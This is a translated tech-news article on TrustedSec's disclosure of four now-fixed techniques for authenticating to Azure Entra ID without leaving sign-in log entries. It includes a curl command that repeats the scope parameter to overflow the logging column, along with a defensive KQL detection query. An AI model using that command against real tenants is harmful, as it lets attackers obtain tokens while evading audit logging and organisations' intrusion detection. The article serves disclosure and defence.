Translated from the original Japanese article
Tech 4 min read

TrustedSec reveals four techniques to authenticate Azure Entra ID sign-in logs without recording them

Azure Entra ID Security certification Vulnerability
IkesanContents

TrustedSec has disclosed four vulnerabilities that completely bypass Azure Entra ID sign-in logs. Both attacks target ROPC (Resource Owner Password Credentials) flows, and TrustedSec suspects that the root cause is a column overflow in the SQL infrastructure used to write logs on the Azure side.

The ROPC flow is an authentication flow that obtains an OAuth2 access token by directly POSTing a username and password, and is retained for compatibility with legacy systems. Although deprecated by modern security guidelines, it is often still present in enterprise environments.

4 tricks

The four bypass techniques discovered by TrustedSec from 2023 to 2025 are shown in chronological order.

NameReport dateModification dateValid token issuanceOverview of method
GraphNinjaAugust 2023May 2024NoneSpecify another tenant ID as the authentication endpoint
GraphGhostDecember 2024April 2025NoneSending invalid values ​​for logon parameters to cause post-authentication processing to fail
GraphGoblinSeptember 26, 2025November 21, 2025YesOverflowing SQL column by repeating scope parameter approximately 35,000 times
Graph******September 28, 2025October 8, 2025YesOverflow SQL column by making User-Agent more than 50,000 characters

GraphNinja and GraphGhost do not issue tokens, while GraphGoblin and Graph****** issue valid access tokens but do not record anything in the sign-in log. The name of the fourth item was intentionally withheld by the author, and Microsoft corrected it before it was officially reported, so it did not go through the normal disclosure process.

GraphGoblin technical details

CVSS v3.1: 7.5 (High), CVSS v4.0: 8.7. CVE number is not disclosed.

flowchart TD
    A[攻撃者] -->|ROPC POST<br/>scope × 35000回繰り返し| B[login.microsoftonline.com]
    B --> C{認証処理}
    C -->|認証成功| D[アクセストークン発行]
    C -->|ログ書き込み試行| E[SQLカラムオーバーフロー]
    E -->|書き込み失敗| F[サインインログ: 記録なし]
    D --> G[攻撃者がトークン取得]
    F --> H[SOC/SIEM: アラートなし]

The attack can be reproduced using curl.

curl -X POST "https://login.microsoftonline.com/${TENANT_ID}/oauth2/v2.0/token" \
  --data-urlencode "scope=$(for num in {1..10000}; do echo -n 'openid ';done)"

By sending a string concatenated with openid about 10,000 to 35,000 times to the scope parameter, overflow the SQL column for writing logs in Azure. Although the authentication itself completes successfully and the token is returned, the log writing phase fails, so nothing is left in the Entra ID sign-in log.

Graph****** method

Here, specify a string of 50,000 characters or more in the User-Agent header. Targeting the same ROPC endpoint and avoiding log writes by overflowing the User-Agent field column. Microsoft fixed this vulnerability before it was officially reported by TrustedSec and did not go through the process of disclosing it through the bounty program.

Detection method

Since it is not recorded in the normal sign-in log, detection requires the use of Microsoft Graph Activity Logs, which requires a Microsoft E5 license. The KQL query published by TrustedSec performs a left outer join on Graph Activity Logs and all sign-in logs to detect token issuances for which there is no corresponding sign-in log.

MicrosoftGraphActivityLogs
| where TimeGenerated > ago(8d)
| join kind=leftanti (union isfuzzy=true
    SigninLogs,
    AADNonInteractiveUserSignInLogs,
    AADServicePrincipalSignInLogs,
    AADManagedIdentitySignInLogs,
    MicrosoftServicePrincipalSignInLogs
    | where TimeGenerated > ago(90d)
    | summarize arg_max(TimeGenerated, *) by UniqueTokenIdentifier
)
on $left.SignInActivityId == $right.UniqueTokenIdentifier

The keys for the left outer join are SignInActivityId (on the Graph Activity Logs side) and UniqueTokenIdentifier (on the sign-in log side). An entry for which no corresponding record is found indicates a bypass.

Microsoft response and issues

Even though GraphGoblin issues valid tokens and does not leave any logs, Microsoft has classified it as “Moderate” and excluded it from bounties. TrustedSec disagrees with this decision, calling the risk of crippled intrusion detection for thousands of organizations significant.

All four have been fixed, but it’s not surprising that similar techniques still exist. Currently, the only countermeasures that can be taken are stopping the ROPC flow if possible and arranging Graph Activity Logs monitoring in the E5 environment.